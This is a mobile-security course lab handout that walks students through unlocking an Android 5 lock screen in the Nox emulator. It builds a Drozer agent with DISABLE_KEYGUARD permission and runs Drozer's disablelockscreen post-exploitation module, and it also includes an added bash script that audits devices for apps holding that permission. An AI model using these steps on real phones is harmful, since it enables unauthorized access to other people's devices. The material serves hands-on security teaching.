Proj 13x: Bypassing a Screen Lock with Nox (10 pts)

What You Need for This Project

Purpose

To bypass a screen lock using a Drozer agent on an Android 5 device. Don't use a more recent Android version or it won't work.

Start Nox

Start Nox. If there is no PIN, open Settings, Security, "Screen lock" and assign a PIN of 1234 as shown below.

Restart Nox

Close Nox and start it again. Swipe up but don't enter the PIN, so you see the lock screen, as shown below.

Downgrading Java

Drozer can't sign apps with recent Java versions, so we need to downgrade Java.

Execute these commands to do that.

apt update
apt install openjdk-8-jdk -y
If an "Outdated processor microcode" box appears, press Enter.

Execute this command to reboot Kali.

reboot
Execute this command to select the default version of javac, the Java compiler:
update-alternatives --config javac
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Execute this command to select the default version of java:

update-alternatives --config java
Find "java-8" on the list and select it. When I did it, that was item 2 as shown below.

Building a Drozer App

To build a Drozer app that requests DISABLE_KEYGUARD permission, in Kali, in a Terminal, at the # bash prompt, execute this command:
drozer agent build --permission android.permission.DISABLE_KEYGUARD
The agent is built and placed in the /tmp directory. Note the path to the agent, highlighted in the image below.

Connecting with ADB

As you did in previous projects, connect to your Nox emulator from Kali, as shown below.

Installing the App

In Kali, in a Terminal, at the # bash prompt, execute these commands to remove any existing agent and install the new one. Replace the path in the second command to match the correct path on your system.
adb uninstall com.mwr.dz
adb install /tmp/tmpvJw0NB/agent.apk
The agent installs, as shown below.

Starting the App

In Kali, in a Terminal, at the # bash prompt, execute these commands to start the agent and forward the TCP port back to Kali.
adb shell am broadcast -n com.mwr.dz/.receivers.Receiver -c com.mwr.dz.START_EMBEDDED
adb forward tcp:31415 tcp:31415
The commands succeed, as shown below.

Installing Drozer Modules

In Kali, in a Terminal, at the # bash prompt, execute these commands to launch Drozer and install the post-exploitation modules.
drozer console connect
module install post
When Drozer asks for a directory to put the modules in, enter this directory:
/usr/local/drozer
The modules install, as shown below.

Unlocking the Phone

In Kali, in a Terminal, at the # bash prompt, execute this command.
run post.perform.disablelockscreen
The phone is unlocked, and Drozer returns a message saying "Done. Check device.", as shown below.
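
The agent built above requests android.permission.DISABLE_KEYGUARD. As an added example (not part of the original project), this script lists every installed package whose `dumpsys package` entry names that permission, so you can audit a device for apps holding it. The sample input is constructed, its layout is an assumption modeled on dumpsys output, and the com.example.* package names are hypothetical.

```shell
#!/usr/bin/env bash
# Added example: flag packages that hold DISABLE_KEYGUARD.
PERM="android.permission.DISABLE_KEYGUARD"

# Reads `dumpsys package` text on stdin; prints each matching package once.
find_keyguard_apps() {
  awk -v perm="$PERM" '
    { sub(/\r$/, "") }                 # older adb shells emit CRLF
    /^[ \t]*Package \[/ {              # block header: Package [name] (id):
      i = index($0, "["); j = index($0, "]")
      pkg = substr($0, i + 1, j - i - 1)
      next
    }
    pkg != "" {
      line = $0
      sub(/^[ \t]+/, "", line)
      # Exact permission name, alone or followed by ":"/"," state details.
      if (line == perm || index(line, perm ":") == 1 || index(line, perm ",") == 1)
        if (!(pkg in seen)) { seen[pkg] = 1; print pkg }
    }
  '
}

# Constructed sample; layout is an assumption modeled on dumpsys output.
sample_dumpsys() {
  cat <<'EOF'
Packages:
  Package [com.mwr.dz] (2f1a9c0):
    userId=10045
    requested permissions:
      android.permission.INTERNET
      android.permission.DISABLE_KEYGUARD
    install permissions:
      android.permission.INTERNET: granted=true
      android.permission.DISABLE_KEYGUARD: granted=true
  Package [com.example.notes] (7c3d511):
    userId=10046
    requested permissions:
      android.permission.INTERNET
  Package [com.example.alarm] (91be0aa):
    userId=10047
    grantedPermissions:
      android.permission.DISABLE_KEYGUARD
      android.permission.WAKE_LOCK
EOF
}

case "${1:-}" in
  --device) adb shell dumpsys package | find_keyguard_apps ;;
  --sample) sample_dumpsys | find_keyguard_apps ;;
esac
```

Run it with `--sample` to see the constructed data, or with `--device` while the emulator is connected over ADB.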

Saving a Screen Image

Make sure the "Done. Check device." message is visible, as shown above.

Save a full-desktop image. On a Mac, press Shift+Command+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 13x", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.128sam@gmail.com with the subject line: Proj 13x from YOUR NAME

Posted 3-20-19